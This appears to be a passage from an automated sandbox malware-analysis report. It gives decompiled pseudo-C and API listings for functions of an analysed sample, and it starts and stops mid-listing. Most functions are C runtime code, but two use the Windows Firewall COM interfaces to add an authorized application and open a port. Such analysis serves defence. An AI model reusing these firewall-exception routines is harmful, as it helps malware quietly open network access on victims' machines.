                                                                                                                                                • Instruction ID: 313440e7783fe40f543a0d41058c5ca78b698d317038779482b2e5a0b8b29d8e
                                                                                                                                                • Opcode Fuzzy Hash: a5c17a9cc363b7e2e7141d6fd5cbf5725f351ece54aebe5a247c7103e8496624
                                                                                                                                                • Instruction Fuzzy Hash: 79B09B3200010CFBCB112F21DC0A8597F55DB403907105010F50807071DF71DD93D590
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF4D4A, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF4D4A(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0xc0093c = _t6;
				if(_t6 != 0) {
					 *0xc00a98 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                0x00bf4d5f
                                                                                                                                                0x00bf4d65
                                                                                                                                                0x00bf4d6c
                                                                                                                                                0x00bf4d73
                                                                                                                                                0x00bf4d79
                                                                                                                                                0x00bf4d6f
                                                                                                                                                0x00bf4d6f
                                                                                                                                                0x00bf4d6f

                                                                                                                                                APIs
                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00BF4D5F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                • Opcode ID: 8ee6201a9919428741074cccfdeb0167b4946e078c6013bb405af10a54d3f551
                                                                                                                                                • Instruction ID: 9354cdef697e5c4755737bcfb6bec86f2b841c94413795ba171cf2f5570824c9
                                                                                                                                                • Opcode Fuzzy Hash: 8ee6201a9919428741074cccfdeb0167b4946e078c6013bb405af10a54d3f551
                                                                                                                                                • Instruction Fuzzy Hash: 48D05E76654709AEEB005F71BC0973A3BDCD784395F268436B90CC7190EA74C980DB00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF22A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                			E00BF22A3(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00BF2177(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










                                                                                                                                                0x00bf22a8
                                                                                                                                                0x00bf22aa
                                                                                                                                                0x00bf22ac
                                                                                                                                                0x00bf22af
                                                                                                                                                0x00bf22b8

                                                                                                                                                APIs
                                                                                                                                                • _doexit.LIBCMT ref: 00BF22AF
                                                                                                                                                  • Part of subcall function 00BF2177: __lock.LIBCMT ref: 00BF2185
                                                                                                                                                  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21BC
                                                                                                                                                  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21D1
                                                                                                                                                  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF21FB
                                                                                                                                                  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF2211
                                                                                                                                                  • Part of subcall function 00BF2177: __decode_pointer.LIBCMT ref: 00BF221E
                                                                                                                                                  • Part of subcall function 00BF2177: __initterm.LIBCMT ref: 00BF224D
                                                                                                                                                  • Part of subcall function 00BF2177: __initterm.LIBCMT ref: 00BF225D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1597249276-0
                                                                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                • Instruction ID: 8c10cafe031115f2e0f7d7b4e62bc06c22dc363766a55948299f7c9eea7584d1
                                                                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                • Instruction Fuzzy Hash: 32B0143154030C33D5101541DC03F153F4D47C1750F140050FF0C1D1D155537555C0CD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF1058, Relevance: 1.5, APIs: 1, Instructions: 7comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CoCreateInstance.OLE32(00BFDB0C,00000000,00000001,00BFDB1C,?,00BF1135,00000000), ref: 00BF106A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                • Opcode ID: 62b3a639891b0965832d63fac4681c0c28bce31ef7568a7f11fbd3d2da603de0
                                                                                                                                                • Instruction ID: 8f1aa189a019f2210634f44ab17fad987faee06bf970ed2e5952b1e561b10ca6
                                                                                                                                                • Opcode Fuzzy Hash: 62b3a639891b0965832d63fac4681c0c28bce31ef7568a7f11fbd3d2da603de0
                                                                                                                                                • Instruction Fuzzy Hash: 18B0923078030876DD101A404E4FF297A966B40F00F210880B300270E386E20054D601
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF3148, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF3148() {
				void* _t1;

				_t1 = E00BF30D6(0); // executed
				return _t1;
			}




                                                                                                                                                0x00bf314a
                                                                                                                                                0x00bf3150

                                                                                                                                                APIs
                                                                                                                                                • __encode_pointer.LIBCMT ref: 00BF314A
                                                                                                                                                  • Part of subcall function 00BF30D6: TlsGetValue.KERNEL32(00000000,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF30E8
                                                                                                                                                  • Part of subcall function 00BF30D6: TlsGetValue.KERNEL32(00000004,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF30FF
                                                                                                                                                  • Part of subcall function 00BF30D6: RtlEncodePointer.NTDLL(00000000,?,00BF314F,00000000,00BF5F7B,00C00398,00000000,00000314,?,00BF3A4C,00C00398,Microsoft Visual C++ Runtime Library,00012010), ref: 00BF313D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2585649348-0
                                                                                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                • Instruction ID: 444f2fa950e508e53b1bf2218ab4ae057267362edb91bb971e30f8ece5a6cb13
                                                                                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00BF1C57, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E00BF1C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xbff008; // 0xf1c81c65
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xc00128 = _t6;
				 *0xc00124 = _t22;
				 *0xc00120 = _t25;
				 *0xc0011c = _t21;
				 *0xc00118 = _t27;
				 *0xc00114 = _t26;
				 *0xc00140 = ss;
				 *0xc00134 = cs;
				 *0xc00110 = ds;
				 *0xc0010c = es;
				 *0xc00108 = fs;
				 *0xc00104 = gs;
				asm("pushfd");
				_pop( *0xc00138);
				 *0xc0012c =  *_t31;
				 *0xc00130 = _v0;
				 *0xc0013c =  &_a4;
				 *0xc00078 = 0x10001;
				_t11 =  *0xc00130; // 0x0
				 *0xc0002c = _t11;
				 *0xc00020 = 0xc0000409;
				 *0xc00024 = 1;
				_t12 =  *0xbff008; // 0xf1c81c65
				_v812 = _t12;
				_t13 =  *0xbff00c; // 0xe37e39a
				_v808 = _t13;
				 *0xc00070 = IsDebuggerPresent();
				_push(1);
				E00BF4E10(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xbfc1b4);
				if( *0xc00070 == 0) {
					_push(1);
					E00BF4E10(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c57
                                                                                                                                                0x00bf1c5d
                                                                                                                                                0x00bf1c5f
                                                                                                                                                0x00bf1c5f
                                                                                                                                                0x00bf24f7
                                                                                                                                                0x00bf24fc
                                                                                                                                                0x00bf2502
                                                                                                                                                0x00bf2508
                                                                                                                                                0x00bf250e
                                                                                                                                                0x00bf2514
                                                                                                                                                0x00bf251a
                                                                                                                                                0x00bf2521
                                                                                                                                                0x00bf2528
                                                                                                                                                0x00bf252f
                                                                                                                                                0x00bf2536
                                                                                                                                                0x00bf253d
                                                                                                                                                0x00bf2544
                                                                                                                                                0x00bf2545
                                                                                                                                                0x00bf254e
                                                                                                                                                0x00bf2556
                                                                                                                                                0x00bf255e
                                                                                                                                                0x00bf2569
                                                                                                                                                0x00bf2573
                                                                                                                                                0x00bf2578
                                                                                                                                                0x00bf257d
                                                                                                                                                0x00bf2587
                                                                                                                                                0x00bf2591
                                                                                                                                                0x00bf2596
                                                                                                                                                0x00bf259c
                                                                                                                                                0x00bf25a1
                                                                                                                                                0x00bf25ad
                                                                                                                                                0x00bf25b2
                                                                                                                                                0x00bf25b4
                                                                                                                                                0x00bf25bc
                                                                                                                                                0x00bf25c7
                                                                                                                                                0x00bf25d4
                                                                                                                                                0x00bf25d6
                                                                                                                                                0x00bf25d8
                                                                                                                                                0x00bf25dd
                                                                                                                                                0x00bf25f1

                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00BF25A7
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF25BC
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00BFC1B4), ref: 00BF25C7
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00BF25E3
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00BF25EA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                • Opcode ID: a0967259ee251276ee73c1469385fe619f9e872899f7485baca382cff85316e7
                                                                                                                                                • Instruction ID: 9589db6283cfab4f253e084cf594ba80983e256b781a501c566a02c914f96e9d
                                                                                                                                                • Opcode Fuzzy Hash: a0967259ee251276ee73c1469385fe619f9e872899f7485baca382cff85316e7
                                                                                                                                                • Instruction Fuzzy Hash: CC21BDB4801208DFD741DF68F985B6C3BF4FB08715F23415AE64887262EBB05A99CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF17BE, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 164comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                			E00BF17BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t80;
				void* _t83;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				signed int _t120;

				_t115 = __edx;
				_t54 =  *0xbff008; // 0xf1c81c65
				_v8 = _t54 ^ _t120;
				_v52 = _a4;
				_v48 = _a8;
				__imp__CoInitialize(0);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v28 = 0;
				_t59 = E00BF80F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t59,  &_v24);
				_t117 = _t59;
				if(_t59 >= 0) {
					_t100 = __imp__CoCreateInstance;
					_t74 =  *_t100( &_v24, 0, 5, 0xbfc17c,  &_v36);
					_t117 = _t74;
					if(_t74 >= 0) {
						_t75 = _v36;
						_t115 =  &_v32;
						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
						_t117 = _t76;
						if(_t76 >= 0) {
							_t77 = _v32;
							_t115 =  &_v40;
							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
							_t117 = _t78;
							if(_t78 >= 0) {
								_t80 = E00BF80F0( &_v40, "HNetCfg.FwAuthorizedApplication");
								__imp__CLSIDFromProgID(_t80,  &_v24);
								_t117 = _t80;
								if(_t80 >= 0) {
									_t83 =  *_t100( &_v24, 0, 5, 0xbfc17c,  &_v28);
									_t117 = _t83;
									if(_t83 >= 0) {
										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E00BF80F0( &_v40, _v48));
										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00BF80F0(_t115, _v52));
										_t90 = _v28;
										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
										_t92 = _v28;
										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
										_t94 = _v28;
										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
										_t96 = _v40;
										_t115 =  &_v44;
										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
										_t117 = _t97;
										if(_t97 >= 0) {
											_t98 = _v44;
											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
										}
									}
								}
							}
						}
					}
				}
				_t60 = _v28;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				_t61 = _v44;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v40;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				_t63 = _v32;
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 8))(_t63);
				}
				_t64 = _v36;
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 8))(_t64);
				}
				__imp__CoUninitialize();
				return E00BF1C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
			}





































                                                                                                                                                0x00bf17be
                                                                                                                                                0x00bf17c4
                                                                                                                                                0x00bf17cb
                                                                                                                                                0x00bf17d4
                                                                                                                                                0x00bf17dd
                                                                                                                                                0x00bf17e0
                                                                                                                                                0x00bf17ef
                                                                                                                                                0x00bf17f2
                                                                                                                                                0x00bf17f5
                                                                                                                                                0x00bf17f8
                                                                                                                                                0x00bf17fb
                                                                                                                                                0x00bf17fe
                                                                                                                                                0x00bf1804
                                                                                                                                                0x00bf180a
                                                                                                                                                0x00bf180e
                                                                                                                                                0x00bf1814
                                                                                                                                                0x00bf182a
                                                                                                                                                0x00bf182c
                                                                                                                                                0x00bf1830
                                                                                                                                                0x00bf1836
                                                                                                                                                0x00bf183b
                                                                                                                                                0x00bf1840
                                                                                                                                                0x00bf1843
                                                                                                                                                0x00bf1847
                                                                                                                                                0x00bf184d
                                                                                                                                                0x00bf1852
                                                                                                                                                0x00bf1857
                                                                                                                                                0x00bf185a
                                                                                                                                                0x00bf185e
                                                                                                                                                0x00bf186d
                                                                                                                                                0x00bf1873
                                                                                                                                                0x00bf1879
                                                                                                                                                0x00bf187d
                                                                                                                                                0x00bf1893
                                                                                                                                                0x00bf1895
                                                                                                                                                0x00bf1899
                                                                                                                                                0x00bf18ac
                                                                                                                                                0x00bf18c0
                                                                                                                                                0x00bf18c3
                                                                                                                                                0x00bf18ca
                                                                                                                                                0x00bf18cd
                                                                                                                                                0x00bf18d5
                                                                                                                                                0x00bf18d8
                                                                                                                                                0x00bf18e0
                                                                                                                                                0x00bf18e3
                                                                                                                                                0x00bf18e8
                                                                                                                                                0x00bf18ed
                                                                                                                                                0x00bf18f0
                                                                                                                                                0x00bf18f4
                                                                                                                                                0x00bf18f6
                                                                                                                                                0x00bf1902
                                                                                                                                                0x00bf1902
                                                                                                                                                0x00bf18f4
                                                                                                                                                0x00bf1899
                                                                                                                                                0x00bf187d
                                                                                                                                                0x00bf185e
                                                                                                                                                0x00bf1847
                                                                                                                                                0x00bf1830
                                                                                                                                                0x00bf1904
                                                                                                                                                0x00bf1909
                                                                                                                                                0x00bf190e
                                                                                                                                                0x00bf190e
                                                                                                                                                0x00bf1911
                                                                                                                                                0x00bf1916
                                                                                                                                                0x00bf191b
                                                                                                                                                0x00bf191b
                                                                                                                                                0x00bf191e
                                                                                                                                                0x00bf1923
                                                                                                                                                0x00bf1928
                                                                                                                                                0x00bf1928
                                                                                                                                                0x00bf192b
                                                                                                                                                0x00bf1930
                                                                                                                                                0x00bf1935
                                                                                                                                                0x00bf1935
                                                                                                                                                0x00bf1938
                                                                                                                                                0x00bf193d
                                                                                                                                                0x00bf1942
                                                                                                                                                0x00bf1942
                                                                                                                                                0x00bf1945
                                                                                                                                                0x00bf195b

                                                                                                                                                APIs
                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00BF17E0
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF17FE
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00BF1804
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF182A
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF186D
                                                                                                                                                  • Part of subcall function 00BF80F0: lstrlenA.KERNEL32(?,F1C81C65,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF8137
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF814D
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00BF1112,00000000), ref: 00BF815C
                                                                                                                                                  • Part of subcall function 00BF80F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00BF1112,00000000), ref: 00BF81EB
                                                                                                                                                  • Part of subcall function 00BF80F0: GetLastError.KERNEL32(?,000000FE,?,00BF1112,00000000), ref: 00BF8206
                                                                                                                                                  • Part of subcall function 00BF80F0: SysAllocString.OLEAUT32(00000000), ref: 00BF8221
                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00BF1873
                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,00BFC17C,?), ref: 00BF1893
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF18A3
                                                                                                                                                  • Part of subcall function 00BF80F0: _malloc.LIBCMT ref: 00BF81A1
                                                                                                                                                • _com_util::ConvertStringToBSTR.COMSUPP ref: 00BF18B7
                                                                                                                                                • CoUninitialize.OLE32 ref: 00BF1945
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                • Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 4233194485-1951265404
                                                                                                                                                • Opcode ID: 40537fe304352cea2ff48e317dcb0459122ebbe7abdc422805df80f0d0f85083
                                                                                                                                                • Instruction ID: 0286ce22b821e4f95c3ff56172ec0092bf0b0b473fe6a5e6839034a3181ae370
                                                                                                                                                • Opcode Fuzzy Hash: 40537fe304352cea2ff48e317dcb0459122ebbe7abdc422805df80f0d0f85083
                                                                                                                                                • Instruction Fuzzy Hash: 30512B71A0021D9FCB10DBA8C889DBEBBF9EF88710B144995FA05F7250DB719D46CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00BF195C, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178comCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                			E00BF195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				void* _t87;
				void* _t90;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				char _t130;
				signed int _t133;

				_t128 = __edx;
				_t61 =  *0xbff008; // 0xf1c81c65
				_v8 = _t61 ^ _t133;
				_v56 = _a4;
				_t130 = 0;
				_v60 = _a8;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_t66 = E00BF80F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t66,  &_v24);
				_t110 = _t66;
				if(_t66 >= 0) {
					_t129 = __imp__CoCreateInstance;
					_t81 =  *_t129( &_v24, 0, 5, 0xbfc17c,  &_v32);
					_t110 = _t81;
					if(_t81 >= 0) {
						_t82 = _v32;
						_t128 =  &_v44;
						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
						_t110 = _t83;
						if(_t83 >= 0) {
							_t84 = _v44;
							_t128 =  &_v40;
							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
							_t110 = _t85;
							if(_t85 >= 0) {
								_t87 = E00BF80F0( &_v40, "HNetCfg.FwOpenPort");
								__imp__CLSIDFromProgID(_t87,  &_v24);
								_t110 = _t87;
								if(_t87 >= 0) {
									_t90 =  *_t129( &_v24, 0, 5, 0xbfc17c,  &_v28);
									_t110 = _t90;
									if(_t90 >= 0) {
										_t129 = _v60;
										_v52 = 0;
										_v48 = 0x100;
										if(E00BF1071(_v60,  &_v48,  &_v52) != 0) {
											_t93 = _v28;
											 *((intOrPtr*)( *_t93 + 0x38))(_t93, _v52);
											_t95 = _v28;
											 *((intOrPtr*)( *_t95 + 0x30))(_t95, _v48);
											 *((intOrPtr*)( *_v28 + 0x20))(_v28, E00BF80F0( &_v40, _v56));
											_t100 = _v28;
											 *((intOrPtr*)( *_t100 + 0x40))(_t100, 0);
											_t102 = _v28;
											 *((intOrPtr*)( *_t102 + 0x28))(_t102, 2);
											_t104 = _v28;
											 *((intOrPtr*)( *_t104 + 0x50))(_t104, 1);
											_t106 = _v40;
											_t128 =  &_v36;
											_t107 =  *((intOrPtr*)( *_t106 + 0x48))(_t106,  &_v36);
											_t110 = _t107;
											if(_t107 >= 0) {
												_t108 = _v36;
												_t110 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, _v28);
											}
										}
										_t130 = 0;
									}
								}
							}
						}
					}
				}
				_t67 = _v28;
				if(_t67 != _t130) {
					 *((intOrPtr*)( *_t67 + 8))(_t67);
				}
				_t68 = _v36;
				if(_t68 != _t130) {
					 *((intOrPtr*)( *_t68 + 8))(_t68);
				}
				_t69 = _v40;
				if(_t69 != _t130) {
					 *((intOrPtr*)( *_t69 + 8))(_t69);
				}
				_t70 = _v44;
				if(_t70 != _t130) {
					 *((intOrPtr*)( *_t70 + 8))(_t70);
				}
				_t71 = _v32;
				if(_t71 != _t130) {
					 *((intOrPtr*)( *_t71 + 8))(_t71);
				}
				__imp__CoUninitialize();
				return E00BF1C57(_t110, _t110, _v8 ^ _t133, _t128, _t129, _t130);
			}









































                                                                                                                                                0x00bf195c
                                                                                                                                                0x00bf1962
                                                                                                                                                0x00bf1969
                                                                                                                                                0x00bf1972
                                                                                                                                                0x00bf1978
                                                                                                                                                0x00bf197b
                                                                                                                                                0x00bf197e
                                                                                                                                                0x00bf198d
                                                                                                                                                0x00bf1990
                                                                                                                                                0x00bf1993
                                                                                                                                                0x00bf1996
                                                                                                                                                0x00bf1999
                                                                                                                                                0x00bf199c
                                                                                                                                                0x00bf19a2
                                                                                                                                                0x00bf19a8
                                                                                                                                                0x00bf19ac
                                                                                                                                                0x00bf19b2
                                                                                                                                                0x00bf19c8
